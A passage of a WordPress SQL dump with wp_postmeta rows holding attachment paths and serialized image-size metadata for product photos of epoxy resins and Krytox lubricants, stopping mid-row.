INSERT INTO `wp_postmeta` VALUES (18397, 1947, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4928;s:6:"height";i:3264;s:4:"file";s:32:"2016/09/EPONEX-UV-resistance.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"EPONEX-UV-resistance-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"EPONEX-UV-resistance-800x530.jpg";s:5:"width";i:800;s:6:"height";i:530;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"EPONEX-UV-resistance-768x509.jpg";s:5:"width";i:768;s:6:"height";i:509;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"EPONEX-UV-resistance-1600x1060.jpg";s:5:"width";i:1600;s:6:"height";i:1060;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"EPONEX-UV-resistance-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"EPONEX-UV-resistance-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"EPONEX-UV-resistance-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:32:"EPONEX-UV-resistance-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18398, 1948, '_wp_attached_file', '2016/09/krytox-gpl-series.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18399, 1949, '_wp_attached_file', '2016/09/EPIREZ.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18400, 1948, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5616;s:6:"height";i:3744;s:4:"file";s:29:"2016/09/krytox-gpl-series.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:29:"krytox-gpl-series-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:29:"krytox-gpl-series-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:29:"krytox-gpl-series-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:31:"krytox-gpl-series-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:29:"krytox-gpl-series-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:29:"krytox-gpl-series-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:29:"krytox-gpl-series-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:29:"krytox-gpl-series-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18401, 1949, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4928;s:6:"height";i:3264;s:4:"file";s:18:"2016/09/EPIREZ.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"EPIREZ-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"EPIREZ-800x530.jpg";s:5:"width";i:800;s:6:"height";i:530;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"EPIREZ-768x509.jpg";s:5:"width";i:768;s:6:"height";i:509;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"EPIREZ-1600x1060.jpg";s:5:"width";i:1600;s:6:"height";i:1060;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"EPIREZ-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"EPIREZ-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"EPIREZ-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"EPIREZ-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18402, 1950, '_wp_attached_file', '2016/09/Epon-resin.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18403, 1950, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5616;s:6:"height";i:3744;s:4:"file";s:22:"2016/09/Epon-resin.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:22:"Epon-resin-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:22:"Epon-resin-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:22:"Epon-resin-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:24:"Epon-resin-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:22:"Epon-resin-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:22:"Epon-resin-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:22:"Epon-resin-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:22:"Epon-resin-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"-1";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18404, 1951, '_wp_attached_file', '2016/09/Heloxy.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18405, 1951, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2336;s:6:"height";i:3323;s:4:"file";s:18:"2016/09/Heloxy.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"Heloxy-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"Heloxy-562x800.jpg";s:5:"width";i:562;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"Heloxy-768x1092.jpg";s:5:"width";i:768;s:6:"height";i:1092;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"Heloxy-1125x1600.jpg";s:5:"width";i:1125;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"Heloxy-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"Heloxy-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"Heloxy-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"Heloxy-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18406, 1952, '_wp_attached_file', '2016/09/EPIKURE.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18407, 1952, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3504;s:6:"height";i:2336;s:4:"file";s:19:"2016/09/EPIKURE.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"EPIKURE-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:19:"EPIKURE-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"EPIKURE-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"EPIKURE-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:19:"EPIKURE-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:19:"EPIKURE-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:19:"EPIKURE-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:19:"EPIKURE-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:44;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18408, 1955, '_wp_attached_file', '2016/08/krytox-fpg-028-2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18409, 1955, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5760;s:6:"height";i:3840;s:4:"file";s:28:"2016/08/krytox-fpg-028-2.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:28:"krytox-fpg-028-2-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:28:"krytox-fpg-028-2-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:28:"krytox-fpg-028-2-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:30:"krytox-fpg-028-2-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:28:"krytox-fpg-028-2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:28:"krytox-fpg-028-2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:28:"krytox-fpg-028-2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:28:"krytox-fpg-028-2-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18410, 1956, '_wp_attached_file', '2016/09/Elastomer-EPOXY.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18411, 1956, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3888;s:6:"height";i:2592;s:4:"file";s:27:"2016/09/Elastomer-EPOXY.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:27:"Elastomer-EPOXY-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:27:"Elastomer-EPOXY-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"Elastomer-EPOXY-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:29:"Elastomer-EPOXY-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:27:"Elastomer-EPOXY-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:27:"Elastomer-EPOXY-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:27:"Elastomer-EPOXY-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:27:"Elastomer-EPOXY-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18412, 1957, '_wp_attached_file', '2016/09/EPON-electrical-laminate.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18413, 1957, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2051;s:6:"height";i:2069;s:4:"file";s:36:"2016/09/EPON-electrical-laminate.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:36:"EPON-electrical-laminate-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:36:"EPON-electrical-laminate-793x800.jpg";s:5:"width";i:793;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:36:"EPON-electrical-laminate-768x775.jpg";s:5:"width";i:768;s:6:"height";i:775;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:38:"EPON-electrical-laminate-1586x1600.jpg";s:5:"width";i:1586;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:36:"EPON-electrical-laminate-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:36:"EPON-electrical-laminate-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:36:"EPON-electrical-laminate-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:36:"EPON-electrical-laminate-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18414, 1958, '_wp_attached_file', '2016/08/krytox-fpg-028-3-e1474477490698.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18415, 1958, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4305;s:6:"height";i:3830;s:4:"file";s:43:"2016/08/krytox-fpg-028-3-e1474477490698.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:43:"krytox-fpg-028-3-e1474477490698-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:43:"krytox-fpg-028-3-e1474477490698-800x712.jpg";s:5:"width";i:800;s:6:"height";i:712;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:43:"krytox-fpg-028-3-e1474477490698-768x683.jpg";s:5:"width";i:768;s:6:"height";i:683;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:45:"krytox-fpg-028-3-e1474477490698-1600x1423.jpg";s:5:"width";i:1600;s:6:"height";i:1423;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:43:"krytox-fpg-028-3-e1474477490698-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:43:"krytox-fpg-028-3-e1474477490698-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:43:"krytox-fpg-028-3-e1474477490698-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:43:"krytox-fpg-028-3-e1474477490698-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18416, 1959, '_wp_attached_file', '2016/09/EPON-Novolac-resins.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18417, 1959, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5152;s:6:"height";i:3264;s:4:"file";s:31:"2016/09/EPON-Novolac-resins.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:31:"EPON-Novolac-resins-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:31:"EPON-Novolac-resins-800x507.jpg";s:5:"width";i:800;s:6:"height";i:507;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:31:"EPON-Novolac-resins-768x487.jpg";s:5:"width";i:768;s:6:"height";i:487;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:33:"EPON-Novolac-resins-1600x1014.jpg";s:5:"width";i:1600;s:6:"height";i:1014;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:31:"EPON-Novolac-resins-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:31:"EPON-Novolac-resins-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:31:"EPON-Novolac-resins-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:31:"EPON-Novolac-resins-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (18418, 1958, '_wp_attachment_backup_sizes', 'a:9:{s:9:"full-orig";a:3:{s:5:"width";i:5760;s:6:"height";i:3840;s:4:"file";s:20:"krytox-fpg-028-3.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:28:"krytox-fpg-028-3-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:11:"medium-orig";a:4:{s:4:"file";s:28:"krytox-fpg-028-3-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:17:"medium_large-orig";a:4:{s:4:"file";s:28:"krytox-fpg-028-3-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:10:"large-orig";a:4:{s:4:"file";s:30:"krytox-fpg-028-3-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:30:"display_product_thumbnail-orig";a:4:{s:4:"file";s:28:"krytox-fpg-028-3-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:28:"krytox-fpg-028-3-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:28:"krytox-fpg-028-3-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:28:"krytox-fpg-028-3-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (18419, 1960, '_wp_attached_file', '2016/09/EPON-Solid-Epoxy-resins.jpg'); 
INSERT INTO `wp_postmeta` VALUES (18420, 1960, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5472;s:6:"height";i:3648;s:4:"file";s:35:"2016/09/EPON-Solid-Epoxy-resins.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:35:"EPON-Solid-Epoxy-resins-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:35:"EPON-Solid-Epoxy-resins-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:35:"EPON-Solid-Epoxy-resins-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:37:"EPON-Solid-Epoxy-resins-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:35:"EPON-Solid-Epoxy-resins-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:35:"EPON-Solid-Epoxy-resins-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:35:"EPON-Solid-Epoxy-resins-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:35:"EPON-Solid-Epoxy-resins-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a